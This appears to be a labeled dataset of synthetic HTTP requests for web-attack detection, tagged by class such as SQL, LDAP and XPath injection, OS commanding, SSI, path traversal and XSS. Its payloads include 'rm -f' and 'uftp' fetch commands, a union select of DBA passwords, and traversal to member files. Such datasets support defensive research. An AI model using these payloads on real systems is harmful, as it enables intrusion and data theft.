Date: Thu, 11 May 06 15:10:02 UTC
ETag: "4NsrfC_QJwuMw5JBGe"
Expect: oteD40
From: eM8p@ehnasbf.it
If-Modified-Since: Thu, 09 Aug 07 12:26:12 CET
If-Unmodified-Since: Sat, 12 Jul 08 06:27:40 GMT
If-Match: *
If-None-Match: "w9vQrv-NUfD7-_AH"
If-Range: "XVF7v0palxOKh_Xy"
Max-Forwards: 8
MIME-Version: 7.3
Pragma: Eslnri=eed9
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: Digest nonce
Range: 5130-,89497-47998,93-50140
Referer: http://www.soerI.ch/7oue/cg2s/f8esa8/sceiaaDo/hakbsT.dll
TE: chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/2.8 (X11; U; SunOS sun4u 1.8; eq-ma; rv:1.8.1) Gecko/60515767
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: FTP/3.5 www.n7ifrdrr.js
Transfer-Encoding: gzip
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43423
Start - Id: 38662
class: LdapInjection
GET /ho9zo7ln/et3oT4ExI70GGlvk/ia7uLMA8_2hpW/ivQppallKZetc12@@/tI/oaOt1.mdb?2aawhctemOqt=+cSyUO%25t1mS&FyeqWCzXS=8091%29%28%26%28objectClass%3Ds0nh%29%28%7C%28sn+%3D+oe%29%28cn%3DL8e+++J*%29%29&G2A_3n=TThaastyle&Ntn5oThe=e8xpT&cs=%7C1os%3Csock_streamo+&jroegghaeeetic=%3Foeds%3Djo&teie3d=npt+&hnhIsii7tazneii=kOz%247&osade8snFe=h+rincludet&Cb6w=S%29+a&dy39yaricInneo=91&UbTJRA.=aupdatevri HTTP/1.1
Host: 157.212.235.71
Connection: close
Accept: application/rtf;q=0.5, application/postscript;q=0.8, image/*
Accept-Charset: isiri-3342, iso-8859-8;q=0.3, cp-936;q=0.9, iso-8859-3;q=0.7
Accept-Encoding: 
Accept-Language: o-nKecgru;q=0.5, fhih-1xba;q=0.8, uepe-aeuhtsym, t4-unu;q=0.7
Cache-Control: min-fresh=68247
Client-ip: 4.62.251.210
Cookie: 5bsectEct2r=060
Cookie2: $Version="896"
Date: Mon, 05 May 08 12:45:23 GMT
ETag: W/"NDTNAThFdSCA-p."
Expect: aero=c3tei1ta;Aetl
From: 0dbnE@pDEweao.biz
If-Modified-Since: Mon, 13 Dec 04 18:14:55 CET
If-Unmodified-Since: Fri, 28 Nov 08 06:25:28 UTC
If-Match: "i2_F0a4e2c5IzbPhvDg"
If-None-Match: "aQporVpJiu_M_E7c27fM"
If-Range: Thu, 09 Aug 07 09:47:04 UTC
Max-Forwards: 533
Pragma: no-cache
Authorization: NTLM ZWdkOG1ubmxpZXNiZWVOcmRPaWNldFRua29zb25lc2Y=
Range: -3789,-5,300-00360
Referer: http://www.ezdzowhl.de/Vwh0m.swf
TE: gzip,trailers,trailers
Trailer: Upgrade
User-Agent: se7Lg/0.0.1.0
UA-OS: Solaris
Via: eees/4.4 55.68.84.13:57, FTP/4.3 www.NanrFnsa.htm, 2.4 236.212.232.139
Transfer-Encoding: gzip
----: -------------------

null

End - Id: 38662
Start - Id: 48480
class: XPathInjection
GET /rKPpasswdur3bftpmochaS1q2/p.PUfTusrtmpB.php?Esrkh1wv=r%27&hmsnaosn3b=1595&tulc=axp_%3Eg4atr+hae%26stylea&hiaulCe=aton8ee&er=naoobject%27jextsa%5C%3Fyu&dd=eTostu%40sAe&mrstn=access_logpuen&mVZou7DCPWinput=%40trpz&9tiPpuejowEiN=ee&dt1bhhiuqetip=tTc&rElmrncelrtteO=9325&rteTo0geSiorl=elmtwesata&oaa=ltD HTTP/1.1
Host: www.lert8n7kh.com
Connection: yANis
Accept: */*
Accept-Charset: shift_jis;q=0.9, iso-8859-1;q=0.4, iso-2022-jp;q=0.9, iso-2022-jp;q=0.1, cp-936;q=0.4
Accept-Encoding: identity
Accept-Language: *;q=0.3
Cache-Control: min-fresh=5774
Client-ip: 248.149.224.94
Cookie: MV1link=509;idhaoyyw4umle=497;gosha8h3uhi=veu/eautf/ruini/child::node()[    position()=747]     |   ciate/gs/i2l/child::text()[position()=8]     or   'hsdy3fre' =    '
Cookie2: $Version="8"
Date: Wed, 24 Oct 07 03:04:49 GMT
ETag: W/"QjhG_WLqfEz8ZBr5M_P"
Expect: 100-continue
From: dcee@oxr3iaetni.ch
If-Modified-Since: Wed, 17 May 06 19:06:46 GMT
If-Unmodified-Since: Sun, 26 Mar 06 21:05:38 GMT
If-Match: "aNNxwaxP95x_Vv2sY"
If-None-Match: "6bkVYAMykvbKqhF"
If-Range: "29LZKBikeQWCXifP"
Max-Forwards: 8987
Pragma: Aittra=uyoy8f
Authorization: NTLM d0xydTBlb3BlbDZuYXJmMm10ZWd0U2Qyc3RhbnJJb2V0ZWh0Z2EwcHVkdGFncno=
Referer: http://www.etNopac.biz/d0l1e.swf
TE: trailers,gzip;q=0.2,trailers
Trailer: Range
User-Agent: Mozilla/0.2 (X11; U; Open BSD i386 4.9; ws-Dx; rv:4.5.9) Gecko/86634631
UA-OS: Windows 95
UA-Pixels: 723x6250
Transfer-Encoding: compress
Upgrade: aee/0.8, t0r/8.6, nel/1.4, teeyb/8.1
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48480
Start - Id: 49092
class: XPathInjection
GET /5cp7ThKFfPsZNm05o/acAnerQacoc7cEDam/Rp/L4MzZ0CTwy3/q86JtCdSd/napArsaahue/_vWyxracceptnph-/sA@@E5YDyRCTGlK/Wb70d7A2BNy.css?6no=allg5%3Ct&afneUjaoeBte1p=41412&oc4bInteehq5=uYnVKtnk-Gz&X6sock_streamo=0809366&teg3llpgeaesha=35372790&6sEo=ui3r%27++++or+1%3C++HNt9%2Fsiy6%2Fdeeb%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D+++or++++%27Pz2i%27+%3D++++%27&5mvorm5xlottdae=Uh7tc&geasren=+%3C1w4%40a+iR+omdR8tef&at=tstylelgvbscriptspassthruno&mOurneiuCe9=5&0nwamyeeemddh=3936&sw9ruq=247535&eiBieilhuslEeud=2ole&aQegtsin=seuncAelocepqhc HTTP/1.0
Host: www.wdeoe.ch:80
Connection: keep-alive
Accept: image/png, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ct3e-nt;q=0.1, 0eive7m-g, A7sU-n;q=0.1
Cache-Control: no-cache
Client-ip: 215.194.111.216
Cookie: 7cAcai4otqttnp9=3;l9edatAet=T(csn1l7;p7DX1UzQj_td=koaeabi3unauuimn
Cookie2: $Version="21"
Date: Mon, 08 Oct 07 09:34:19 UTC
ETag: "9zbdhmHRPBJn6NucEb"
Expect: dfeh5=siacsoEI
From: oayjh@w9ulna6.biz
If-Modified-Since: Tue, 16 Sep 08 03:12:22 GMT
If-Unmodified-Since: Wed, 19 Sep 07 08:41:47 CET
If-Match: "YX24meIygT5cF8U6B"
If-None-Match: *
If-Range: Sun, 13 Nov 05 20:50:30 UTC
Max-Forwards: 7
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: bAo1v ibijaido=uede
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: /6e4TeIba/a2eiet.tiff
TE: trailers,gzip
Trailer: Referer
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 0.7; hs-du; rv:3.0.3) Gecko/50921844
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: 8.9 www.fhLf.jpg
Transfer-Encoding: deflate
Upgrade: mtodno/2.6
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49092
Start - Id: 43466
class: OsCommanding
GET /n953zjQJY31lrQ8KUFi/dS6ehhipbutn3eouoip/rXDUssjl.7YpXDVVw/no.etJLC3D1gheA.jpg?VXRpv5K=yiPoneogtaiwlOtnu&rltjgas2o68t=l+Aeaconnectoneag&oS=dSrfJ&yRwbanE3tmA=780&earhlgl=s86ZR&nbbnw=h0tedtmfr5eedhatQe&Lps9L=fIvad&resti25Errse2es=ovTWgU&ointa=+etchar&mams=675240&dilryRe=rm+++-f++%2Ftmp%2Fnt++%7C&wMZfULJVWnullu=4488 HTTP/1.1
Host: 196.12.15.49
Connection: lkOoeN
Accept: */*
Accept-Charset: iso-8859-2;q=0.9
Accept-Encoding: identity;q=0.5, deflate, compress, gzip;q=0.9, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 5.223.71.17
Cookie: qic8onrtn9ntav=rFj3a
Cookie2: $Version="5"
Date: Thu, 05 Jun 08 18:52:47 GMT
ETag: W/"HdxF4Pc2cI8Pr7_vJL"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
If-Modified-Since: Wed, 27 Oct 04 24:13:13 UTC
If-Unmodified-Since: Thu, 26 Feb 04 19:20:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.8
Pragma: eeez=9Nh
Authorization: tUmcn a4hk=n4Iui
Referer: http://mene.gov/enio/nrs4nf/nzn3l/IilH/ipemor.fgf
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 8.8; hr-nt; rv:3.6.7) Gecko/12221982
UA-CPU: Sparc
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: tgIia/4.5, tqrgN/1.9, ioi/4.3
Warning: 666 166.163.91.248 "reqnetwydVCbEhnmif" "Thu, 16 Oct 08 05:40:51 UTC"
----: -----------------------------

null

End - Id: 43466
Start - Id: 37133
class: LdapInjection
GET /YHiUprocessing-instructionvL/sAhyr8vota/raaXDC4.NlJG/qeafe/WcVPuZ5ipasswdG4I/dCSQrz5zbNH@1yPM/0metaKD0MfIS/03KkPqeMLCF-AR3Oi/hrr4oa/lifFoaIn/6rio2Ly/ryCDm.cG3_YOeM-.shtml?UnHWiRmocha6o=338&pli2OeTduoja7=sicgsrAe6fgvee5&enL0=+%40o0&SWodt=48677686&henHinlpeoxgt=aEao&DKOxMlunionVbu=r8&UBGXVhjki=%29++%28+++%7C%28bft%3Dlht*%29&zhiecviaasrn=ezeddHgthsyieo4SAs&emaFeewa=r%7Csxp_t2alhtpassrbsrre+hy HTTP/1.0
Host: 216.173.218.255
Connection: keep-alive
Accept: */*
Accept-Charset: big5, x-mac-chinesesimp, iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=278
Client-ip: 165.184.227.237
Cookie: ooihfnnzEsu=59726;g2dUDs9=cvnti
Cookie2: $Version="74"
Date: Thu, 08 May 08 01:29:18 UTC
ETag: "omsqKnISdrLKr-1_"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Tue, 22 Jul 08 20:27:35 CET
If-Unmodified-Since: Sun, 28 Oct 07 01:40:28 GMT
If-Match: *
If-None-Match: "sW9tBDDa1bTwnwhx"
If-Range: *
Max-Forwards: 759
MIME-Version: 8.7
Pragma: aefnttep=u
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: Digest nonce
Range: -972338,855782-
Referer: /nesem/doa1t.conf
TE: trailers,deflate;q=0.3
Trailer: Accept-Language
User-Agent: Apaho (aViw_8h; to6hRE_; efJs7NI2Lj; gk3FjqYY)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.5 www.ibmt0eie.tiff
Transfer-Encoding: deflate
Upgrade: oEAO/0.4, NrmE/9.1, 2tirU/3.2, dprdqi/9.1, ejn2sn/3.5
Warning: 290 81.121.41.20 "1erpeehEtorXv" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37133
Start - Id: 38254
class: LdapInjection
GET /lsneortIafim1bterymr.aspx?5epheta=aiT7%2FnaocTt&ubltlue4od5h=55%29%28%26%28objectClass%3Di9o%29%28%7C%28sn+++%3D+++ie%29%28cn%3Du+++J*%29%29&kaatTdxud=child%3C&aehS9ys=aqe%2Be&RRWllocationDwinnt=tleo HTTP/1.0
Host: 159.124.167.254:888
Connection: oh1earj
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.4, gzip;q=0.2, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 113.81.106.78
Cookie: Vg-mEnS.Rftp=eyo$itacQftpug;eSllHtibAmea=lAMm3Iv3fgC;bmoenes6Ayst2=|6s~/
Cookie2: $Version="7"
Date: Tue, 24 Jun 08 07:28:05 GMT
ETag: "HmmK-Pe-jjfxx-a"
Expect: 100-continue
From: Eorust@uthn0.it
If-Modified-Since: Thu, 30 Sep 04 23:14:00 UTC
If-Unmodified-Since: Mon, 04 Feb 08 01:07:30 UTC
If-Match: "o8xU69oDhENqsmWJ.QN-"
If-None-Match: "BM5Iw0_2fJIZz3jEOH"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: NTLM czNhdnQyRmFoaGx0c3pleWV0dW5oZXRlUm40b3Jpc3dycGNlY29lbnRucmlzcm10
Range: -23
Referer: http://www.6taa3bi.fr/EeebX/oadda.cfm
TE: chunked,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.7 (compatible; Konqueror/5.5; SunOS sun4u; d6zi)
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 980x990
Via: FTP/1.7 www.metiens.tiff, FTP/3.1 10.162.11.207
Transfer-Encoding: compress
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38254
Start - Id: 47050
class: XSS
GET /6IS.E-.optuZG6un/ehcregifsD9eSNeo3iS6/snW.htm?dckgdr=%3Cform%2Bname%3Di++++%3E%3Cselect%2Bname%3Dxivt+++%3Ehttp%3A%2F%2Fwww.aim.com%2FswE%2F%3F%3C%2Fselect%3E%3C%2Fform+++%3E&kXt8eec40rhwar=5&ec8fueton=8204 HTTP/1.1
Host: 137.93.221.83
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: cp-950;q=0.0, windows-1254, windows-874, iso-10646-ucs-2;q=0.7
Accept-Encoding: identity, identity;q=0.5, deflate;q=0.3, identity, identity
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 67.25.41.239
Cookie: adtoiepostWr=u9dhnnae;Itsge=%\;dgmiDiee=l-miHwujVBe;Onstn=46;xA=9399
Cookie2: $Version="452"
Date: Wed, 17 Aug 05 17:58:00 GMT
ETag: "v3TftZeHd8EU2vMvbiP"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Sat, 16 Jan 10 13:50:59 UTC
If-Unmodified-Since: Mon, 22 Aug 05 02:50:01 GMT
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: *
If-Range: *
Max-Forwards: 224
MIME-Version: 1.7
Pragma: emedlm='o5mawtn'
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest response="8745DFa2b418762cEBbecDFf1fC62878"
Range: 388869-790680,430-,-04157
Referer: http://www.aisjtaa.ch/Ena1ueho/eT4knreu.pdf
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.8 (Windows; U; Win98 0.9; sy-u7; rv:1.0.9) Gecko/72598903
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 3.1 130.185.200.45, 8.4 www.y1ssws.htm, 4.9 107.177.178.240
Transfer-Encoding: deflate
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 325 www.hiofaai.jpg "t4eneszdrtoed" "Mon, 26 Jul 04 01:19:48 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47050
Start - Id: 44975
class: PathTransversal
GET /ilEmtMKi/a6utE1yHtndtgxrtm7Ca/idZMF/dom6ntaae/uxlsVLQ/iIkJsmbXs..OPgYu/e8ShoensExEnfbgoe/l4hhtnalhe4zo/0NhomeinsertR/autoexecXDIK.b.shtml?hrosnoe0cve=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500 HTTP/1.1
Host: www.lmyero.net
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish;q=0.2, windows-1258, euc-tw
Accept-Encoding: *
Accept-Language: wdza78-emrocI, lm0te-xs
Cache-Control: no-store
Client-ip: 81.141.204.248
Cookie: faaxnoe=071977;Rrs=110580;sel=11714
Cookie2: $Version="998"
Date: Wed, 15 Apr 09 02:40:33 UTC
ETag: W/"olNjm62@_Zy7aV.QSeHA"
Expect: 100-continue
From: 3srmpro4@bnhd9wr.de
If-Modified-Since: Sat, 27 Dec 08 21:00:23 UTC
If-Unmodified-Since: Mon, 25 Oct 04 06:00:42 UTC
If-Match: "1PKjliFUbeDC_p5py5c"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 53
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM b1BhTG9venJuT0F5dGtlaWVpc251YXZudGNhUmtldG9qQXM=
Authorization: NTLM RTN0Mmhyc2VjZkx0dWppYTlyNmJuYmljZER3ZWF6b2RkdkloZQ==
Range: -972278
Referer: http://lOeebeo.com/e65s/a7hnoni/oxopstt/Is3ce1.php3
TE: trailers
Trailer: Accept
User-Agent: Mozilla/3.2 (compatible; MSIE 7.3; Linux i386; emprswlia; ug6ts; ei95mstD)
UA-CPU: Sparc
UA-Disp: 7612,740,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: HTTP/4.7 www.eahoiNd.tiff
Transfer-Encoding: deflate
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 88070194263
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44975
Start - Id: 43035
class: OsCommanding
PUT /7y8NNqwb0/rM.sh? HTTP/1.0
Content-Length: 255
Content-Language: ueNf
Content-Encoding: compress
Content-Location: http://4o5ehbce.com/3itvnt.pl
Content-MD5: em1zbmV6ZWVqOGo0dGRpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Jun 06 15:02:09 GMT
Last-Modified: Wed, 25 Nov 09 02:51:28 GMT
Host: 69.165.178.83
Connection: close
Accept: video/mpeg, audio/*;q=0.2
Accept-Charset: iso-8859-6, iso-8859-1, euc-jp;q=0.9, x-mac-roman;q=0.9
Accept-Encoding: gzip;q=0.4, deflate;q=0.5, gzip
Accept-Language: lo-2rna3;q=0.8, eL1e7m-hert, uu-Nlare;q=0.5, laUKeol-f;q=0.7
Cache-Control: max-age=957
Client-ip: 65.119.102.85
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="6"
Date: Thu, 18 Oct 07 22:11:39 UTC
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: VsNdtdt@rdorILi.de
If-Modified-Since: Tue, 04 Aug 09 12:58:22 CET
If-Unmodified-Since: Mon, 07 May 07 24:31:59 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 567
Pragma: 3=cfce
Proxy-Authorization: Digest opaque="ais18i"
Authorization: NTLM aTRhbmVybHRzcXJlZVR0M3RzZTA2ZGVPZXpkZmlhdGU=
Range: -98633,070828-,-9277
Referer: /go2hiwt.php4
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: thsr8llntAm
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.6 www.w8es.html
Transfer-Encoding: gzip
Upgrade: 6CozN/5.3, aqmg/9.3, yryyou/0.4, eket/6.8, aiea/8.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zB_@w8-gm=tTon4sm &ssFus-wu=03&Sdwhyyr=eh-kZeeixi&zdmfC1rh1=37836&clewakoOfe=68567&8-l0ZneWva6=eveiT3f&3ox=9&etSrIdf=cyRRB2&9tr=64980&nhletmncWibirIa=having2i&Eehioene=549&Eha='    ;uftp  -g     /home/nich/maernginni 38.87.173.197    /ertr ;

End - Id: 43035
Start - Id: 41411
class: SqlInjection
POST /wahto1z0aoolitcbmcir/k2n6uiruE4idrwD/wEqg/EzOS.jsp? HTTP/1.0
Content-Length: 182
Content-Language: o,d,9oie
Content-Encoding: deflate
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: aVNlc0xyaW10bVVkYXNucg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Apr 07 15:20:43 UTC
Last-Modified: Thu, 15 Apr 10 14:31:42 GMT
Host: 122.221.133.96
Connection: close
Accept: application/*, video/*;q=0.7
Accept-Charset: x-mac-korean;q=0.8, cp-932;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=776
Client-ip: 199.178.94.59
Cookie: NioERrm=nlbeH7suofeeSutqw;@Hx_jGgN=vCeM;eAriratSo=0373925;rztnnho5d=4g
Cookie2: $Version="59"
Date: Thu, 03 May 07 14:29:19 CET
ETag: "BYEx6p_a1HSRDSiA@"
Expect: lmDa5=8ijgro;lbni3hs=iin2blna
From: cTensp@smyerSeiti.st
If-Modified-Since: Fri, 14 Oct 05 20:02:43 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: "uvdcNXV02-c.1moQC"
If-None-Match: "MBHk0t2FfH@tbD-G"
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 5602
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM ZGR0aWRlc0lzeXRibmQ4bXRoYWJlZXljdTdBaWlyZWVlaQ==
Range: 24-
Referer: http://www.qre3a.fr/Rqe54pz/h7seco.jpeg
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: caeiao9al35
UA-CPU: MIPS
UA-Disp: 0223,7526,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1178x5140
Via: 5.8 166.231.232.58, FTP/9.0 9.198.186.114
Transfer-Encoding: identity
Upgrade: etntne/4.1, Iossd/8.2
Warning: 593 249.185.61.208 "duOsdrnv" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ieyaiaii3Nyi=qHvh&AAi=r=&J.rwj4=938&eerE=0382&Vptr=09951738&5fnDeo=98&tLattemrao=and    0<>(select count(*)     from   ee   where  renqosre<>)&geobdtyhmmatsEe=?eo

End - Id: 41411
Start - Id: 40483
class: SSI
GET /d0/UuBQeaEPCJNyVyr/eiryisb/fdRrx08.php?la5naUr=709&ixemQSWCftpNBY=9hm1x6Mm&hsr=84312581&TXK9q=eaBmth5irmma&HidLzinput5m=opdiGi5trndrrl&entn=%3C%21--++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&yjLnH=q3andepSuhy&o6srdi=sh%2Bx&nqr=tek5+htacces1ncNfituf&eeniennehae=Lug&die=994566&iCDa=Hon&78oceAiie=vHO&m93hlgs0aL=ecupdate%3F&dsR3=+nsjehiexte HTTP/1.0
Host: 253.85.92.42:80
Connection: close
Accept: video/quicktime, video/quicktime;q=0.8
Accept-Charset: iso-8859-1, iso-10646-ucs-2;q=0.8, windows-1254, windows-1251;q=0.8, windows-1253;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: ysoenZw-hnyas;q=0.8, reakew-hic, towk-1tL, n91c64en-oEmb5R;q=0.9
Cache-Control: no-transform
Client-ip: 178.48.213.72
Cookie: 299LlibI-E1=o oe;selretfdxeagonr=f8lsne-o;gti=tdeanu lr8n;ph4nayliec=tthrwtre0rtq
Cookie2: $Version="497"
Date: Fri, 05 Aug 05 10:19:07 GMT
ETag: "Cc_WWQ8J@_p@urD"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 67
MIME-Version: 7.1
Pragma: mo='2x'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM aVRzd25zd3lpM0VhYUF1eXFlanp6bDNlZXBpNVpkcnpuaWJUZmE=
Range: -2,3-4,8136-
Referer: /tezis1i4/vAahh/c9Ict/htteee/hffettb.htm
TE: chunked,gzip
Trailer: Host
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 5.6; dg-dh; rv:1.7.5) Gecko/60433853
UA-CPU: PowerPC
UA-Disp: 609,4490,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0287x026
Via: ee8n/3.2 247.177.94.213, FTP/0.5 www.foMnu.tiff
Transfer-Encoding: gzip
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40483
Start - Id: 42158
class: SqlInjection
GET /h5ido3owt8attetAulnb/2ahMedeaOdhboo/4.BNIkvconnect4Bw/y5theadm3otnlh/an.html?-6oJWUx3=17&V6WMe4cLinsert=fSiace&iImteolf=%27union+++select+PASSWORD+from++++DBA_PASSWORD%3B--&d2hzobjectPgcm=pim&gxtermWqYFautoexecwherep=kK1&jdmseheml3e=-%29mxd2obsU5ri%3Do&telnetuWoJKC=3181678&RZR2A@C3=tD HTTP/1.1
Host: 168.32.107.51
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-japanese;q=0.7, cp-932, iso-8859-1;q=0.7, windows-1252;q=0.0, x-mac-icelandic
Accept-Encoding: compress;q=0.8, gzip;q=0.4, compress;q=0.9, identity;q=0.8
Accept-Language: ecic-dnT, IertDo-r9h1ipno;q=0.4, lhrTnd-mtRnuNrT;q=0.8, deimt-Tis4ino
Cache-Control: max-stale
Client-ip: 154.205.192.119
Cookie: hTjaji5t=38245540;eRessF= n~t
Cookie2: $Version="18"
Date: Fri, 21 Jul 06 23:23:45 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: aho2Bm=aetsd4di;yyd5s
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 23 Mar 09 06:32:03 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: "WC_sA9U12wVxJI9ag"
If-None-Match: *
If-Range: Sun, 05 Jul 09 21:38:34 GMT
Max-Forwards: 63
MIME-Version: 5.8
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: 1amnfh fgysaSi=yomEae
Range: 4781-
Referer: /ncMo.bin
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/2.5 (Windows; U; Win98 3.4; eS-a9; rv:3.8.5) Gecko/29889672
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: 7.1 135.172.215.71
Transfer-Encoding: gzip
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42158
Start - Id: 47055
class: XSS
